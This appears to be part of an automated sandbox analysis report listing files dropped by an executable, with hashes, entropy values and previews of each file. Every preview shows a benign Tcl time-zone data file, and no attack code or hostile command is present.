                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CST6CDT) {.. {-9223372036854775808 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-84384000 -18000 1 CDT}.. {-68662800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.804821796604604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/0nalGe2IAcGE2NEOyn:SlSWB9vsM3y7UEOXHAIgpUEqA6N/0af9
                                                                                                                                                                                                                              MD5:33A04963E70EBF29339204348E0DF874
                                                                                                                                                                                                                              SHA1:456C0DB88ECE4D180EEE5AE5AEF5FBEB6E977D00
                                                                                                                                                                                                                              SHA-256:6DC6354D761CBE7820C9186568CAB87AD48CA925507F6A740357195B60E16D87
                                                                                                                                                                                                                              SHA-512:DF8F46827760BD7EC922C6837E0B6649B4FBD220B79E6F1B67FE3DD8CB3D2D035ECDAF4CF6CE5BDE6DC79C6F7B6EE2B9787AF08A97845CD0D647720A2E78D7EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:Canada/Atlantic) $TZData(:America/Halifax)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.863241040396457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0po/vXHAIg20puFvHRL/0nPQox/h4IAcGEpoyn:SlSWB9vsM3y7pYHAIgppuRN/0d490pl
                                                                                                                                                                                                                              MD5:97E50CE9FBA3F1A6DFCF333F9E6D592C
                                                                                                                                                                                                                              SHA1:EE472C411079E788DBF32FAC9C5B7EE121960DC2
                                                                                                                                                                                                                              SHA-256:DB32E83949D62478D229E9FB57BB1624D21B3A9CCEE4CD55335F8262C01D820A
                                                                                                                                                                                                                              SHA-512:D547E3DC03848A677BE67F7CF4124E067F76EE09BB724A5B10F028BEA72C1526B17678A035B2C53F69498E9ECAACD3C5445D42B7FE58DF706DD2C5F2ADA05A73
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:Canada/Central) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.758562813220951
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/0nbHboxp4IAcGEqM:SlSWB9vsM3y7RQtHAIgpRQPN/0Dboxpp
                                                                                                                                                                                                                              MD5:4365BEFA3D50EEE20843EF97A095E512
                                                                                                                                                                                                                              SHA1:7756049B4CD6459742686925E9516E64A9727306
                                                                                                                                                                                                                              SHA-256:22844994AE893F3236A091B050E932E84A5218EC0D01F72595E17CCC471FA564
                                                                                                                                                                                                                              SHA-512:CB265E79DF926026BEBF7158590369ABE5353C759540F509ABBA2A7ADBE59A705BC2AB936F400614BE610EDB761DE9A2B1E179A0A8B0A87E595392362C2516AA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:Canada/Eastern) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.8181126338833655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx07nKL50vXHAIg207nKLyRRL/0nNYLo/4IAcGE7nK1:SlSWB9vsM3y77G2HAIgp7bN/0W8/4908
                                                                                                                                                                                                                              MD5:FA0D0024AD72CCE4EC7229FA897FB1B7
                                                                                                                                                                                                                              SHA1:4373A07F2674FE974189CC801987652AA97F0204
                                                                                                                                                                                                                              SHA-256:D7A203E60FF19DCDEAAD14121720DE51DA73392D25B40FFA301C1935CDF89517
                                                                                                                                                                                                                              SHA-512:82EF7F429604A69734B04D298B4C9C9AC3BE57B9DD8C4CECF59C7AB3470BDFBA0505886C4E6AA3864F5EC7FBB4C69C54CF153A6417376828234833013C29A0C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Edmonton)]} {.. LoadTimeZoneFile America/Edmonton..}..set TZData(:Canada/Mountain) $TZData(:America/Edmonton)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.998628928230972
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7tgYJHAIgptVN/0xdBx+90twv:MByMYnKpTt590g
                                                                                                                                                                                                                              MD5:A2DCCB8BFC65DD4E7C3BB7F10DCEFF11
                                                                                                                                                                                                                              SHA1:6FD2F4FAE06C5D4D3F189A167A98AA76497569DD
                                                                                                                                                                                                                              SHA-256:87F42F45FD7D059CA47650D445420DE8320F3A7C1CBC7671FBFA8A8881274433
                                                                                                                                                                                                                              SHA-512:F42E32C5BD785BA914E5054784BF67DDF951460A708290D1899621CEEDC63475B584FC052A86A3B6D45BF3C651D42427FB6F9CE2A2A33764DFFF731053BECC16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/St_Johns)]} {.. LoadTimeZoneFile America/St_Johns..}..set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.887587766811186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7ZLgXPHAIgpZLgFN/0N290ZLgK:MByMY13p1stx901/
                                                                                                                                                                                                                              MD5:68900CE38FE0E40578323BBD3D75184E
                                                                                                                                                                                                                              SHA1:9D5EAB5CBCD495DD46974207FBE354A81DD2070F
                                                                                                                                                                                                                              SHA-256:5C4FD46054B190A6D4B92585B4DAE4E3A8233EE2996D14472835DDD264911DC6
                                                                                                                                                                                                                              SHA-512:3EF53F0FCD8D88A1B977886BDFAA03D7B84EF021AC6BEDF7C571BFBF2242BFC3F3EB6A6B6A9C2F6852AF412A96DFBC30F3BB25A6619CBCD8736F3DF5B64DE1BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Vancouver)]} {.. LoadTimeZoneFile America/Vancouver..}..set TZData(:Canada/Pacific) $TZData(:America/Vancouver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.887593462838566
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/0nogS64IAcGEsAzEB:SlSWB9vsM3y7hzi2HAIgphznN/0Hd499
                                                                                                                                                                                                                              MD5:A4237BDCAF68B0EFECA97178F3DEE724
                                                                                                                                                                                                                              SHA1:A9CBC02B5545A63A0C9B38C8FA7FA2DE6D483188
                                                                                                                                                                                                                              SHA-256:46BA00AE3A07A4DC83D6CB517D87C9CBBA491B3421FE9AD6C74CAC5695EB73F7
                                                                                                                                                                                                                              SHA-512:832BF256BE8CB2DD205DDE50017448D5830B46FF4DCA77BDB852067EE0C9DF9977014F2A3E3DD6944336158D8EA377CFBBE519EE5B56FB26EB64325B45476B9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:Canada/Saskatchewan) $TZData(:America/Regina)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.889486451014262
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7peR2fkSHAIgppeR2rN/0CF/490peR24:MByMYkGk7pkOtBQ90kB
                                                                                                                                                                                                                              MD5:490D99BD5465CBF5A8FE28F33180B8A6
                                                                                                                                                                                                                              SHA1:4783295C31A804BE98145270ED28956A0783E655
                                                                                                                                                                                                                              SHA-256:A1B1AF37DC89C6BA663E4E967A18409AE4E0FA9EF1B908D0461368DA31001C09
                                                                                                                                                                                                                              SHA-512:9F6B4F204A21B69E1DFCB766C0671D3736414C73269DCEDCDB4FC3DBA869BBA1511DF6B5061F8964F0AF9C3816133D04E5DFB8A6AD07CA06E7712787A8FECC5A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Whitehorse)]} {.. LoadTimeZoneFile America/Whitehorse..}..set TZData(:Canada/Yukon) $TZData(:America/Whitehorse)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.812019117774239
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7tfEJkHAIgptfEJo5N/0rHM490tfEJB:MByMYE9pEOt4X90EB
                                                                                                                                                                                                                              MD5:6EF54792279C249B16877100682F1806
                                                                                                                                                                                                                              SHA1:A62629EA055207D917740E3AEF4F0B005EA49CC4
                                                                                                                                                                                                                              SHA-256:5B40167DD0C0B5C293861070C4AC249F78DDF8BAD798DD0165E3AE894C9B9570
                                                                                                                                                                                                                              SHA-512:3CF93003C3EA2B4386660F0C87074F9AE2BAC4EE72D88451DCB1EA8B79502D2187B1608B6D5CE8D7EDC00AED99CF9DB7B006EB6ED2A2B5009F2C0E757D282D74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Santiago)]} {.. LoadTimeZoneFile America/Santiago..}..set TZData(:Chile/Continental) $TZData(:America/Santiago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.808907056781067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG7ZAJWXHAIgObT7ZAiFvRL/0bxOdBx/nUDH7ZAZv:SlSWB9vsM3ycJAUHAIgObJAiRN/04dBn
                                                                                                                                                                                                                              MD5:2EC4FDD1EFBAF1D9F9DBAC8B1B5EDD09
                                                                                                                                                                                                                              SHA1:FECED8EBC7B666628B7B45C9694FCB3A0B20A42A
                                                                                                                                                                                                                              SHA-256:1E2DA1862E0E0F131B7C6EB12FAC5F920852C61C162993A30BC843A464A5AAD4
                                                                                                                                                                                                                              SHA-512:74D61141505BAF1ABAD61FB91941C63C169EFE3C85829FEBB4D29A72EA54D1A07EC84E2E9B48E963E65CBF7663245459FAD288D620B1BEFFE682A2D1C243794D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Easter)]} {.. LoadTimeZoneFile Pacific/Easter..}..set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):175
                                                                                                                                                                                                                              Entropy (8bit):4.857134440822812
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02TEMVFfXHAIg202TEyRRL/0lIAcGE2TEMy:SlSWB9vsM3y76EkHAIgp6EyRN/0l9068
                                                                                                                                                                                                                              MD5:3FB16EA4A9B0529220133C4A7B05215B
                                                                                                                                                                                                                              SHA1:BD56B6E76A92A5925140CB5CC3D940E1DE90993F
                                                                                                                                                                                                                              SHA-256:6F4F2D7F5BCA4E5183460C0153D2B98F5239A99F149DE6638B311C73CEDB1329
                                                                                                                                                                                                                              SHA-512:690EC1BCE7FA979BD55725B8ED6DF042BB331CAD332827B2C64B31F107539934AA5A30268B1F03D52697528E68A1BA72E4D56B5199A68B1ED897B75FAFB33A8A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Havana)]} {.. LoadTimeZoneFile America/Havana..}..set TZData(:Cuba) $TZData(:America/Havana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7440
                                                                                                                                                                                                                              Entropy (8bit):3.695300167191082
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:CgDIMcVbf+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlt:KlfyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:34339D40AC889DCB5A09D10F123175AD
                                                                                                                                                                                                                              SHA1:57E1F70FA8999106FA3874A9CE1E75A7ACBC81E9
                                                                                                                                                                                                                              SHA-256:64E284F9F7A36CC0A352809141D76E73A99344A9F30CFFEA254CBB9D2C589ADA
                                                                                                                                                                                                                              SHA-512:2DCF16D9D7593FC3E5844E18FD689AADA157866490CFD37A38A47F747DDA189822055F6DD470CA2D77040D2C5A2527512880C22ED8EC16D9424EDF3DC228AFED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EET) {.. {-9223372036854775808 7200 0 EET}.. {228877200 10800 1 EEST}.. {243997200 7200 0 EET}.. {260326800 10800 1 EEST}.. {276051600 7200 0 EET}.. {291776400 10800 1 EEST}.. {307501200 7200 0 EET}.. {323830800 10800 1 EEST}.. {338950800 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                              Entropy (8bit):4.924838898127838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yLbNMXGm2OHLVva0v:SlSWB9eg/ylDm2OHLVi0v
                                                                                                                                                                                                                              MD5:B221E7141FFC9DEA317F64F81C7BB4E0
                                                                                                                                                                                                                              SHA1:B13BBDE790B169D8B9075275523F319D5173E2C7
                                                                                                                                                                                                                              SHA-256:6344BE02529C1CC5F7B5FE14B7E9BBCED4DDE68A24B824601EEBCAE207ABFDF2
                                                                                                                                                                                                                              SHA-512:FFFA733476D6C7DCF49C0B88C9F5E381DE2B69BAEDF6C7B1D91C6F45CE2D36E06D40F25B6BB65D4B5D650471BB52CD2EC3F68703DAB4BD5414F8D3F831D92BD2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST) {.. {-9223372036854775808 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.8091719283634853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R+kNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:RXoSItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:4578FE48781599B55F4BCF5560019789
                                                                                                                                                                                                                              SHA1:4EAA7134621DFDEBFD1405F5CC58227FA7E80C3A
                                                                                                                                                                                                                              SHA-256:0BE6161403BC5A96BFAB174F2C3FCBA8A677D4349699B408E9872B9DD0FE15CE
                                                                                                                                                                                                                              SHA-512:9ACC2EF396F635D22E3DF6B785831AD74B510049F1BE85F996467A5BBC0DF49A28B2FC3E4CA0CA9DC8FC2C29EA50D909F0B153265B107445D3052E81D9A4D50A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST5EDT) {.. {-9223372036854775808 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-84387600 -14400 1 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.862365884559795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsPHV5XHAIgNGE7TRRL/yCh0DcPHy:SlSWB9vsM3y7fHAIgNTRN/yg0DH
                                                                                                                                                                                                                              MD5:ACD69F34396296BA553243267D06CEE0
                                                                                                                                                                                                                              SHA1:9575FFE5E7833B9532F17AC5413EA9DB23F07ECA
                                                                                                                                                                                                                              SHA-256:936B6484469351DEF8FAFE8EC180862729F5E43BDE4E53E2E9636E221B54C3C2
                                                                                                                                                                                                                              SHA-512:149D23FF35747127E9A2F4056D09472E8E689970BC795D5411C5BF621D949ADDEBDA68674D375A248A63106ABDFF6C54A8AFE5385C45BE2916CAED0C30F7C4A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Cairo)]} {.. LoadTimeZoneFile Africa/Cairo..}..set TZData(:Egypt) $TZData(:Africa/Cairo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                                              Entropy (8bit):4.901791318009318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV5QH+o3vXHAIgoq6QHFRRL/yMQs/h8QanQHuv:SlSWB9vsM3ymnQeoPHAIgonQzN/yM/hm
                                                                                                                                                                                                                              MD5:E9C2C97EB65526F1D4BE1AD7385336FA
                                                                                                                                                                                                                              SHA1:09E4000CE320F779E2DFCA2FFD6B9258FFBA6CE4
                                                                                                                                                                                                                              SHA-256:B78A833337EFEC8B5F64622F1BFDA21FCB79CF290E9CF32A54B206EB20C6FDE9
                                                                                                                                                                                                                              SHA-512:EAEC097B58BF466CC7D6C0C6297628AF910CC308AC822565FD6CDABF96CD4EC57D4CC724FE782B6C1B606DFF9424013F6A890A871339577F7CB68BBB3C425E65
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Dublin)]} {.. LoadTimeZoneFile Europe/Dublin..}..set TZData(:Eire) $TZData(:Europe/Dublin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                                              Entropy (8bit):4.928744204623185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDMbNMXGm2OHvDwy:SlSWB9eg/yRQJDm2OHsy
                                                                                                                                                                                                                              MD5:9C08898081382F52CE681B592B8E2C8D
                                                                                                                                                                                                                              SHA1:165944424740B1FA9B4B3B8E622198ABD0BDA0F8
                                                                                                                                                                                                                              SHA-256:66B0DF8888883BFF44B18728B48CDF24AAED0BB745D601F3422C4F2D4063E0AC
                                                                                                                                                                                                                              SHA-512:86EA639F999169F2FBA2457BE5042463A1938031268CCA71FDD03CCBC6194932937BA58B49FBED461E055E9AA668FF6EBF391AA7EC603C0A425416DF2E6CC84D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT) {.. {-9223372036854775808 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.910789466104329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDOm7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRSw8RQy
                                                                                                                                                                                                                              MD5:333F2BFA92742A49BB88F11C7CD896A9
                                                                                                                                                                                                                              SHA1:BB5BEC010C36427AEEBDDA2FB72083E22A3F5073
                                                                                                                                                                                                                              SHA-256:64466EA3759301E88C29AD1A833CDCBBC495EB4A5A3AC45E7B2987FECD6702BD
                                                                                                                                                                                                                              SHA-512:E2270F4B57C5F1C849726259B886E8644DCF497FA0D034AD48885146BEDC70DC8899900DA9AC01F2609A2DA881E10F9042CCBF75A3F5DA7344D7E92F1B070806
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.980500771169276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOveyXMXGm2OH1VOwVn:SlSWB9eg/yRSvPDm2OH1VOwV
                                                                                                                                                                                                                              MD5:A7C3FD06D1E06F125813C9687C42067C
                                                                                                                                                                                                                              SHA1:515622C0B63E977AFBFC78AD8466053C4A4A71A6
                                                                                                                                                                                                                              SHA-256:3BE1EC71D2CC88FA9A3DB7DC0476475F33FE5BCBE6BC35C0F083859766466C32
                                                                                                                                                                                                                              SHA-512:548DA608CFCA5B8539652F94CA2040D624602D2DF64B2C8CCDB8B219B9B384E01386CDF95F3BF77409DF0584FA12A3B73D56D13107D98BEB4C2555F458B3F374
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+1) {.. {-9223372036854775808 -3600 0 -01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
